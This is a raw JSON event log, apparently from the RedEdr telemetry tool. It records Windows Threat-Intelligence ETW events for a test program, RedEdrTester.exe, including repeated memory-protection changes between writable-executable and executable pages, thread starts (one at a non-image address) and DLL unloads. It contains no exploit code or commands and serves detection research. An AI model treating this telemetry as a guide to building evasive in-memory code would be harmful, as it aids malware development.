type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C540","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":107,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910241,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C720","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C720","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":108,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910254,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C5E0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365CB30","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":109,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910267,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":110,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910279,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365CB30","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C7C0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":111,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910292,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C630","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C5E0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":112,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910304,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C900","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"128","RegionSize":"0x0000025BA365C810","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":113,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910316,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9F0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C9A0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown 
type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":114,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910328,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C810","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C8B0","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":115,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910344,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C9A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown 
type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C900","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":116,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910355,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C4A0","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C950","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":117,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910372,"trace_id":41,"type":"etw"},{"BaseAddress":"0x0000025BA365C540","CallingProcessCreateTime":"2024/12/20 17.48.17","CallingProcessId":"1208","CallingProcessProtection":"(Unknown type)","CallingProcessSectionSignatureLevel":"(Unknown 
type)","CallingProcessSignatureLevel":"(Unknown type)","CallingProcessStartKey":"25332747903961354","CallingThreadCreateTime":"2024/12/20 17.48.17","CallingThreadId":"6916","LastProtectionMask":"64","OriginalProcessCreateTime":"2024/12/20 17.48.17","OriginalProcessId":"1208","OriginalProcessProtection":"(Unknown type)","OriginalProcessSectionSignatureLevel":"(Unknown type)","OriginalProcessSignatureLevel":"(Unknown type)","OriginalProcessStartKey":"25332747903961354","ProtectionMask":"32","RegionSize":"0x0000025BA365C900","TargetProcessCreateTime":"2024/12/20 17.48.17","TargetProcessId":"1208","TargetProcessProtection":"(Unknown type)","TargetProcessSectionSignatureLevel":"(Unknown type)","TargetProcessSignatureLevel":"(Unknown type)","TargetProcessStartKey":"25332747903961354","event":"PROTECTVM_LOCAL","id":118,"pid":1208,"provider_name":"Microsoft-Windows-Threat-Intelligence","thread_id":6916,"time":133791868973910413,"trace_id":41,"type":"etw"},{"callback":"thread_create","create":0,"id":119,"krn_pid":1208,"pid":1208,"threadid":11092,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":0,"id":120,"krn_pid":1208,"pid":1208,"threadid":6916,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":0,"id":121,"krn_pid":1208,"pid":1208,"threadid":3196,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"callback":"thread_create","create":0,"id":122,"krn_pid":1208,"pid":1208,"threadid":5680,"time":133791868989812038,"trace_id":41,"type":"kernel"},{"CycleTime":"181056096","ProcessID":"1208","StackBase":"FFFF8185AAC62000","StackLimit":"FFFF8185AAC5C000","StartAddr":"00007FF7711C4616","SubProcessTag":"0","TebBase":"0000009FD88D8000","ThreadID":"6916","UserStackBase":"0000009FD8B00000","UserStackLimit":"0000009FD8AF6000","Win32StartAddr":"00007FF7711C4616","event":"ThreadStopStop 
","id":123,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801347736,18446735283796947549,18446735283798949776,18446735283799009711],"thread_id":6916,"time":133791868989812926,"trace_id":41,"type":"etw"},{"CycleTime":"287100","ProcessID":"1208","StackBase":"FFFF8185AAC77000","StackLimit":"FFFF8185AAC71000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DA000","ThreadID":"11092","UserStackBase":"0000009FD8C00000","UserStackLimit":"0000009FD8BFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStopStop ","id":124,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801347736,18446735283796947549,18446735283798949776,18446735283799009711],"thread_id":11092,"time":133791868989812928,"trace_id":41,"type":"etw"},{"CycleTime":"107316","ProcessID":"1208","StackBase":"FFFF8185AAC8C000","StackLimit":"FFFF8185AAC86000","StartAddr":"00007FFC8513D110","SubProcessTag":"0","TebBase":"0000009FD88DC000","ThreadID":"3196","UserStackBase":"0000009FD8D00000","UserStackLimit":"0000009FD8CFF000","Win32StartAddr":"00007FFC8513D110","event":"ThreadStopStop 
","id":125,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801347736,18446735283796947549,18446735283798949776,18446735283799009711],"thread_id":3196,"time":133791868989813773,"trace_id":41,"type":"etw"},{"CycleTime":"2887740","ProcessID":"1208","StackBase":"FFFF8185AC7B9000","StackLimit":"FFFF8185AC7B3000","StartAddr":"0000023F29030000","SubProcessTag":"0","TebBase":"0000009FD88DE000","ThreadID":"5680","UserStackBase":"0000009FD8E00000","UserStackLimit":"0000009FD8DF7000","Win32StartAddr":"0000023F29030000","event":"ThreadStopStop ","id":126,"opcode_id":2,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283797242684,18446735283801644436,18446735283801643055,18446735283801352931,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814117,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FF771160000","ImageBase":"00007FF771160000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\Users\\hacker\\source\\repos\\RedEdr\\x64\\Debug\\RedEdrTester.exe","ImageSize":"000000000018E000","ProcessID":"1208","TimeDateStamp":"1734703906","event":"ImageUnloadInfo ","id":127,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814755,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC628D0000","ImageBase":"00007FFC628D0000","ImageCheckSum":"2249853","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbased.dll","ImageSize":"0000000000222000","ProcessID":"1208","TimeDateStamp":"3642813796","event":"ImageUnloadInfo 
","id":128,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814891,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC62B00000","ImageBase":"00007FFC62B00000","ImageCheckSum":"929031","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp140d.dll","ImageSize":"00000000000E2000","ProcessID":"1208","TimeDateStamp":"4270244042","event":"ImageUnloadInfo ","id":129,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989814978,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC630A0000","ImageBase":"00007FFC630A0000","ImageCheckSum":"0","ImageName":"\\Device\\HarddiskVolume2\\RedEdr\\RedEdrDll.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"1734697896","event":"ImageUnloadInfo ","id":130,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815067,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC73E50000","ImageBase":"00007FFC73E50000","ImageCheckSum":"1883635","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\dbghelp.dll","ImageSize":"00000000001E4000","ProcessID":"1208","TimeDateStamp":"2592498981","event":"ImageUnloadInfo 
","id":131,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815129,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC77340000","ImageBase":"00007FFC77340000","ImageCheckSum":"215677","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140d.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3390545094","event":"ImageUnloadInfo ","id":132,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815203,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC7DD50000","ImageBase":"00007FFC7DD50000","ImageCheckSum":"124685","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\vcruntime140_1d.dll","ImageSize":"000000000000F000","ProcessID":"1208","TimeDateStamp":"743278547","event":"ImageUnloadInfo ","id":133,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815284,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82800000","ImageBase":"00007FFC82800000","ImageCheckSum":"3204207","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\KernelBase.dll","ImageSize":"00000000002FE000","ProcessID":"1208","TimeDateStamp":"3522100337","event":"ImageUnloadInfo 
","id":134,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815348,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82B00000","ImageBase":"00007FFC82B00000","ImageCheckSum":"1180473","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32full.dll","ImageSize":"0000000000117000","ProcessID":"1208","TimeDateStamp":"576863693","event":"ImageUnloadInfo ","id":135,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815408,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C20000","ImageBase":"00007FFC82C20000","ImageCheckSum":"199345","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcrypt.dll","ImageSize":"0000000000027000","ProcessID":"1208","TimeDateStamp":"2535700803","event":"ImageUnloadInfo ","id":136,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815463,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82C50000","ImageBase":"00007FFC82C50000","ImageCheckSum":"1076532","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ucrtbase.dll","ImageSize":"0000000000100000","ProcessID":"1208","TimeDateStamp":"2177850761","event":"ImageUnloadInfo 
","id":137,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815520,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82F60000","ImageBase":"00007FFC82F60000","ImageCheckSum":"531569","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\bcryptprimitives.dll","ImageSize":"0000000000082000","ProcessID":"1208","TimeDateStamp":"3309379821","event":"ImageUnloadInfo ","id":138,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815580,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC82FF0000","ImageBase":"00007FFC82FF0000","ImageCheckSum":"137991","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\win32u.dll","ImageSize":"0000000000022000","ProcessID":"1208","TimeDateStamp":"3336608826","event":"ImageUnloadInfo ","id":139,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815638,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83070000","ImageBase":"00007FFC83070000","ImageCheckSum":"659111","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcp_win.dll","ImageSize":"000000000009D000","ProcessID":"1208","TimeDateStamp":"958749903","event":"ImageUnloadInfo 
","id":140,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815696,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83190000","ImageBase":"00007FFC83190000","ImageCheckSum":"811940","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\kernel32.dll","ImageSize":"00000000000C2000","ProcessID":"1208","TimeDateStamp":"2273328705","event":"ImageUnloadInfo ","id":141,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815751,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC833E0000","ImageBase":"00007FFC833E0000","ImageCheckSum":"218727","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\gdi32.dll","ImageSize":"000000000002B000","ProcessID":"1208","TimeDateStamp":"3634633287","event":"ImageUnloadInfo ","id":142,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815806,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83410000","ImageBase":"00007FFC83410000","ImageCheckSum":"1244603","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\rpcrt4.dll","ImageSize":"0000000000123000","ProcessID":"1208","TimeDateStamp":"2016036219","event":"ImageUnloadInfo 
","id":143,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815860,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83B50000","ImageBase":"00007FFC83B50000","ImageCheckSum":"766771","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\advapi32.dll","ImageSize":"00000000000B1000","ProcessID":"1208","TimeDateStamp":"187986496","event":"ImageUnloadInfo ","id":144,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815915,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83D40000","ImageBase":"00007FFC83D40000","ImageCheckSum":"681663","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\msvcrt.dll","ImageSize":"000000000009E000","ProcessID":"1208","TimeDateStamp":"2616593924","event":"ImageUnloadInfo ","id":145,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989815968,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC83DE0000","ImageBase":"00007FFC83DE0000","ImageCheckSum":"244437","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\imm32.dll","ImageSize":"000000000002F000","ProcessID":"1208","TimeDateStamp":"3510600902","event":"ImageUnloadInfo 
","id":146,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816028,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC84650000","ImageBase":"00007FFC84650000","ImageCheckSum":"673563","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\sechost.dll","ImageSize":"000000000009F000","ProcessID":"1208","TimeDateStamp":"1942365337","event":"ImageUnloadInfo ","id":147,"opcode_id":0,"pid":1208,"provider_name":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","stack_trace":[18446735283802249410,18446735283797621171,18446735283801386793,18446735283801520226,18446735283800918026,18446735283801353166,18446735283801754190,18446735283799009541],"thread_id":5680,"time":133791868989816082,"trace_id":41,"type":"etw"},{"DefaultBase":"00007FFC848D0000","ImageBase":"00007FFC848D0000","ImageCheckSum":"1221752","ImageName":"\\Device\\HarddiskVolume2\\Windows\\System32\\ole32.dll","ImageSize":"000000000012B000","ProcessID":"1208","TimeDateStamp":"610785574","event":"ImageUnloadInfo 